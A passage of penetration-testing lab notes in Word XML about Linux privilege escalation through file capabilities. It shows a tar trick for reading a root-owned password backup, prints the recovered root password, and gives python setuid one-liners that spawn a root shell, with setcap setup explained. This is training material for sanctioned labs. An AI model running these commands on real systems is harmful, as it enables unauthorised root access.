      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.old_pass.bak</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> file within the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/var/backups</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> folder.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000239F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4452938" cy="1855391"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="307" name="image312.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image312.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId748"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4452938" cy="1855391"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000023A0">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000023A1">
      <w:pPr>
        <w:spacing w:after="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We can see the file is owned by root, so the password is likely related to that account, right?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000023A2">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">So, if you try and just open it, you will get permission denied. Thankfully, we have our extremely capable friend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w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000023A3">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We will get around the permission issues by compressing the file, and then decompressing it, bypassing the permission issue due to the unique Capability set to the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command. For this I moved back to where the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command was located,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000023A4">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000023A5">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"># Compress the file</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000023A6">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">./tar -cf pass.tar /var/backups/.old_pass.bak</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000023A7">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000023A8">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"># Decompress our file, with permissions ignored.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000023A9">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">./tar -xf pass.tar</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000023AA">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000023AB">
      <w:pPr>
        <w:spacing w:after="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This should give us access to the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.old_pass.bak</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> file, though you might need to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cd</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> a little. When you open the file you should come across the password </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Ts&amp;4&amp;YurgtRX(=~h</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, another one we wouldn't brute force.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000023AC">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">With this password you can now attempt to login as root, I simply logged off of usermin and then went back in as root and reopened the console and popped open the flag.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000023AD">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_ue67prv7aao0" w:id="315"/>
      <w:bookmarkEnd w:id="315"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Exploiting python capabilities</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000023AE">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000023AF">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Also seen in </w:t>
      </w:r>
      <w:hyperlink r:id="rId749">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Levram</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PG Practice with </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/bin/python3.10 cap_setuid=ep</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000023B0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="476"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Exploited with:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000023B1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="476"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/bin/python3.10 -c 'import os; os.setuid(0); os.system("/bin/bash")'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000023B2">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000023B3">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In the Katana PG Play, we saw this after running LinPeas (but we would have saw the same thing if we had ran</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> getcap -r / 2&gt;/dev/null</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000023B4">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000023B5">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000023B6">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="4546600"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="246" name="image238.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image238.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId750"/>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23B7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1336"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/bin/python2.7 cap_setuid+ep</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000023B8">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000023B9">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Since this is a /usr/bin thing, I went to GTFO bins and found that there was a </w:t>
      </w:r>
      <w:hyperlink r:id="rId751">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">capability listed for python</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (not specific to 2.7)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000023BA">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000023BB">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1524000"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="124" name="image121.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image121.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId752"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="1524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3BC">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000023BD">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">So since we have python 2.7 we would run:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000023BE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="281"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/bin/python2.7 -c 'import os; os.setuid(0); os.system("/bin/bash")'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000023BF">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000023C0">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Why they only ran the last line and not the first two:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000023C1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="225"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The first two lines are setup. If the capability is already present on the binary (e.g. pre-set by the challenge or vulnerable system), you only need to run the payload—the last line. And here, as we saw before, the capability was already set on the python binary so no need to do this set up</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000023C2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="225"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You will see this often in GTFO bins, where you only run the last line</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000023C3">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000023C4">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Explaining the set up (first two lines):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000023C5">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cp $(which python) .</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000023C6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1135"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Copies the system's Python binary to the current directory.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000023C7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1135"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Why? So you can modify it (e.g. apply capabilities) without affecting the global system Python.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000023C8">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000023C9">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo setcap cap_setuid+ep python</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000023CA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="782"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Sets the CAP_SETUID capability on the local copy of Python.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000023CB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="782"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
